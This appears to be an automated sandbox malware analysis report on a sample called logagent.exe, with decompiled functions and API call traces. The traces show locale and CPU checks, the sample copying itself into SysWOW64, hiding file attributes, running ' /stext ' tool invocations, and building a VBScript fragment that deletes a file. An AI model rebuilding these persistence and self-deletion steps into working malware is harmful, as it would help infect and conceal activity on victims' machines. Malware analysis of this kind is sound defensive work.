                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: 21b9efa670f21c68742e6ddf4daf796ac161ac54f97a083ce8069b5058884fb0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 27D05E36948B204EE764A618B882BE232A0EB94731F95443BE5821AAD4E5A468C20658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10546AE5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E10546AE5(void* __ecx) {
				signed int _t3;
				signed int _t4;
				intOrPtr _t6;
				intOrPtr _t7;
				void* _t8;

				_t8 = __ecx;
				_t3 = GetKeyboardLayout(0);
				_t4 = _t3 & 0x000003ff;
				_t6 = 9;
				if(_t4 == _t6) {
					L3:
					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
					return _t4;
				} else {
					_t7 = 0x10;
					if(_t4 != _t7) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t8 + 0x38)) = _t7;
						return _t4;
					}
				}
			}








                                  0x10546ae6
                                  0x10546aea
                                  0x10546af2
                                  0x10546af7
                                  0x10546afb
                                  0x10546b0a
                                  0x10546b0a
                                  0x10546b0e
                                  0x10546afd
                                  0x10546aff
                                  0x10546b03
                                  0x00000000
                                  0x10546b05
                                  0x10546b05
                                  0x10546b09
                                  0x10546b09
                                  0x10546b03

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 10546AEA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayout
                                  • String ID:
                                  • API String ID: 194098044-0
                                  • Opcode ID: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction ID: db9f0fae980a080f7ea919997120f19ac03c2e90a70e37e3a9b5e17c641c71b0
                                  • Opcode Fuzzy Hash: 735f306a23b8debe55fd3af3f4c285691be61ff21da7241a1c559ef9645d9055
                                  • Instruction Fuzzy Hash: 2AD0A7379487219EF394A718B8427D02AD0EB94731FA2843BE5828B9D4E4E068C34264
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054B80C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E1054B80C(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				 *0x415318( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                  0x1054b81d
                                  0x1054b82e
                                  0x1054b838

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,1054E673,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,004166C4), ref: 1054B81D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004124A0 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E004124A0(intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr* _t10;

				_t10 = _a4;
				_t6 = _a8;
				asm("cpuid");
				 *_t10 = _t6;
				 *((intOrPtr*)(_t10 + 4)) = _t7;
				 *((intOrPtr*)(_t10 + 8)) = 0;
				 *((intOrPtr*)(_t10 + 0xc)) = __edx;
				return _t6;
			}






                                  0x004124a5
                                  0x004124a8
                                  0x004124ad
                                  0x004124af
                                  0x004124b1
                                  0x004124b4
                                  0x004124b7
                                  0x004124bd

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                  • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                  • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AE6A Relevance: 173.7, APIs: 98, Strings: 1, Instructions: 485filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                    • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                    • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                    • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                    • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                    • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                    • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                    • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                    • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AF9F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFB2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFBB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFC4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AFCD
                                  • Sleep.KERNEL32(00000064), ref: 0040AFDD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AFE6
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AFFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B00C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B019
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B026
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B030
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B043
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B04C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B055
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B066
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B07D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B08F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B09C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B0A9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B0B3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0C7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B0E2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040B0EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040B0FF
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B111
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B11E
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040B12B
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B135
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B149
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B152
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B15B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B164
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B196
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(7620F560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,7620F560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1AF
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1B6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1C5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B1E1
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B1E8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040B1F1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040B20A
                                  • DeleteFileW.KERNEL32(00000000), ref: 0040B211
                                  • Sleep.KERNEL32(000001F4), ref: 0040B22A
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415B14), ref: 0040B243
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,0041B310,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B28B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B29B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?,00000000), ref: 0040B2AB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000,?,?,?), ref: 0040B2B8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?,0041B310,00000000), ref: 0040B2C5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040B2D2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2DF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000069), ref: 0040B300
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B309
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B312
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B31B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B327
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B333
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B33F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040B2E9
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B411
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B41D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B42F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B43B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B447
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B450
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B459
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B462
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B46B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B474
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@G@std@@$??1?$basic_string@$D@2@@std@@$G@2@@std@@$V?$basic_string@$Hstd@@$?c_str@?$basic_string@$G@2@@0@V10@0@$??0?$basic_string@$D@2@@0@$D@1@@File$G@1@@V10@V10@@$Delete$SleepV01@@rand$??8std@@CreateModuleNameV01@Y?$basic_string@srandtime
                                  • String ID: /stext "
                                  • API String ID: 1338134179-3856184850
                                  • Opcode ID: 935c2ce95a8cb78159c839ce4c4cda60361ab1ff26450eff623e928e592d347b
                                  • Instruction ID: be4b94b66ba9b0bd8820f021ae38252d46d58d745cb1822e142cef95b78b0ffe
                                  • Opcode Fuzzy Hash: 935c2ce95a8cb78159c839ce4c4cda60361ab1ff26450eff623e928e592d347b
                                  • Instruction Fuzzy Hash: 4D02EDB2C0050DEBDB05EBE0EC59EDE7B7CAF54345F04806AF516A3091EB745689CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407E37 Relevance: 142.1, APIs: 70, Strings: 11, Instructions: 326fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wcslen.MSVCRT ref: 00407E46
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00407E64
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                  • wcscmp.MSVCRT ref: 00407EE0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 00407F25
                                  • wcslen.MSVCRT ref: 00407F40
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                  • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000), ref: 00407FC6
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe), ref: 00407FD3
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040801D
                                  • wcslen.MSVCRT ref: 00408022
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 0040803B
                                  • _wgetenv.MSVCRT ref: 0040804B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\SysWOW64\logagent.exe,?,00415628,0041623C), ref: 004080B0
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
